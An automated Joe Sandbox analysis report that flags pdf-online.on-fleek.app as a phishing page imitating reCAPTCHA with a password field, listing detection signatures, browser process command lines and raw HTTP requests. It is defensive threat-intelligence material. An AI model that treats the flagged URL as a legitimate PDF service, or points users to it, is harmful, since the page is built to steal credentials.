Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://pdf-online.on-fleek.app/

Overview

General Information

Sample URL:https://pdf-online.on-fleek.app/
Analysis ID:1520326
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Detected non-DNS traffic on DNS port
Drops files with a non-matching file extension (content does not match file extension)
Found iframes
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 2140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2192,i,1005448200650348598,15467487990718780475,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pdf-online.on-fleek.app/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • Acrobat.exe (PID: 7024 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\downloaded.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 916 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 4504 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1716,i,16758670913067445225,6828871122202533892,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.citydiamondcontracting.com/contact" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6764 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://pdf-online.on-fleek.app/Avira URL Cloud: detection malicious, Label: phishing
Source: https://pdf-online.on-fleek.app/styles.cssAvira URL Cloud: Label: phishing

Phishing

barindex
Source: https://pdf-online.on-fleek.app/LLM: Score: 9 Reasons: The brand 'reCAPTCHA' is well-known and is associated with Google., The legitimate domain for reCAPTCHA is 'recaptcha.net' or 'google.com/recaptcha'., The provided URL 'pdf-online.on-fleek.app' does not match the legitimate domain for reCAPTCHA., The URL contains suspicious elements such as 'on-fleek.app', which is not associated with reCAPTCHA., The use of 'pdf-online' in the URL is unrelated to reCAPTCHA and raises suspicion. DOM: 0.5.pages.csv
Source: https://www.citydiamondcontracting.com/contact#sec1Matcher: Found strong image similarity, brand: GOOGLE
Source: https://www.citydiamondcontracting.com/clientsMatcher: Template: amazon matched
Source: https://www.citydiamondcontracting.com/clientsMatcher: Template: amazon matched
Source: https://www.citydiamondcontracting.com/clientsMatcher: Template: amazon matched
Source: https://pdf-online.on-fleek.app/HTTP Parser: Iframe src: 1.pdf
Source: https://pdf-online.on-fleek.app/HTTP Parser: Iframe src: 1.pdf
Source: https://pdf-online.on-fleek.app/HTTP Parser: Iframe src: 1.pdf
Source: https://pdf-online.on-fleek.app/HTTP Parser: Iframe src: 1.pdf
Source: https://www.citydiamondcontracting.com/contactHTTP Parser: Iframe src: https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2sus
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/-PcNMUQloeU
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/LiEQ_JV0h4w
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/xFzWNmILl40
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/Jo_coLYPcOQ
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/erCmtRLIjD8
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/kG5xyR1406I
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/vs01gUJV3iQ
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/QJ96N5lUn0c
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Iframe src: https://www.youtube.com/embed/hOPpxvP2E28
Source: https://www.tomsher.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-0KG8DMQFJJ&gacid=170381380.1727418093&gtm=45je49p0v889720200za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1120686961
Source: https://www.tomsher.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-0KG8DMQFJJ&gacid=170381380.1727418093&gtm=45je49p0v889720200za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1120686961
Source: https://www.tomsher.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-0KG8DMQFJJ&gacid=170381380.1727418093&gtm=45je49p0v889720200za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1120686961
Source: https://www.tomsher.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-0KG8DMQFJJ&gacid=170381380.1727418093&gtm=45je49p0v889720200za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1120686961
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: Iframe src: https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2sus
Source: https://pdf-online.on-fleek.app/HTTP Parser: Number of links: 0
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Number of links: 1
Source: https://pdf-online.on-fleek.app/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://www.citydiamondcontracting.com/aboutHTTP Parser: Title: About Us does not match URL
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: Title: DRA Product Design Industry Factory & CDC Office - YouTube does not match URL
Source: https://www.tomsher.com/HTTP Parser: Title: Web Development & Digital Marketing Company in Dubai, UAE does not match URL
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Legal
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Legal
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Legal
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Digital Accessibility Innovators
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Terms & Conditions
Source: https://www.tomsher.com/HTTP Parser: Invalid link: Legal
Source: https://www.tomsher.com/HTTP Parser: Form action: https://www.tomsher.com/submit.php
Source: https://www.tomsher.com/HTTP Parser: Form action: https://www.tomsher.com/submit.php
Source: https://www.tomsher.com/HTTP Parser: Form action: https://www.tomsher.com/submit.php
Source: https://www.tomsher.com/HTTP Parser: Form action: https://www.tomsher.com/submit.php
Source: https://pdf-online.on-fleek.app/HTTP Parser: <input type="password" .../> found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/contactHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: No favicon
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: No favicon
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="author".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="author".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="author".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/contactHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/aboutHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/certificationsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/projectsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/projectsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/projectsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/newsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/newsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/newsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/servicesHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/servicesHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/clientsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/clientsHTTP Parser: No <meta name="author".. found
Source: https://www.citydiamondcontracting.com/clientsHTTP Parser: No <meta name="author".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="copyright".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="copyright".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="copyright".. found
Source: https://pdf-online.on-fleek.app/HTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/contactHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/aboutHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/certificationsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/projectsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/projectsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/projectsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/newsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/newsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/newsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/servicesHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/servicesHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/videoHTTP Parser: No <meta name="copyright".. found
Source: https://www.tomsher.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.tomsher.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.tomsher.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.tomsher.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/contact#sec1HTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/clientsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/clientsHTTP Parser: No <meta name="copyright".. found
Source: https://www.citydiamondcontracting.com/clientsHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.4:65341 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:65306 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /styles.css HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1.pdf HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w.png HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w.png HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1.pdf HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd&co=aHR0cHM6Ly9wZGYtb25saW5lLm9uLWZsZWVrLmFwcDo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=lw8g0bn9ca2d HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
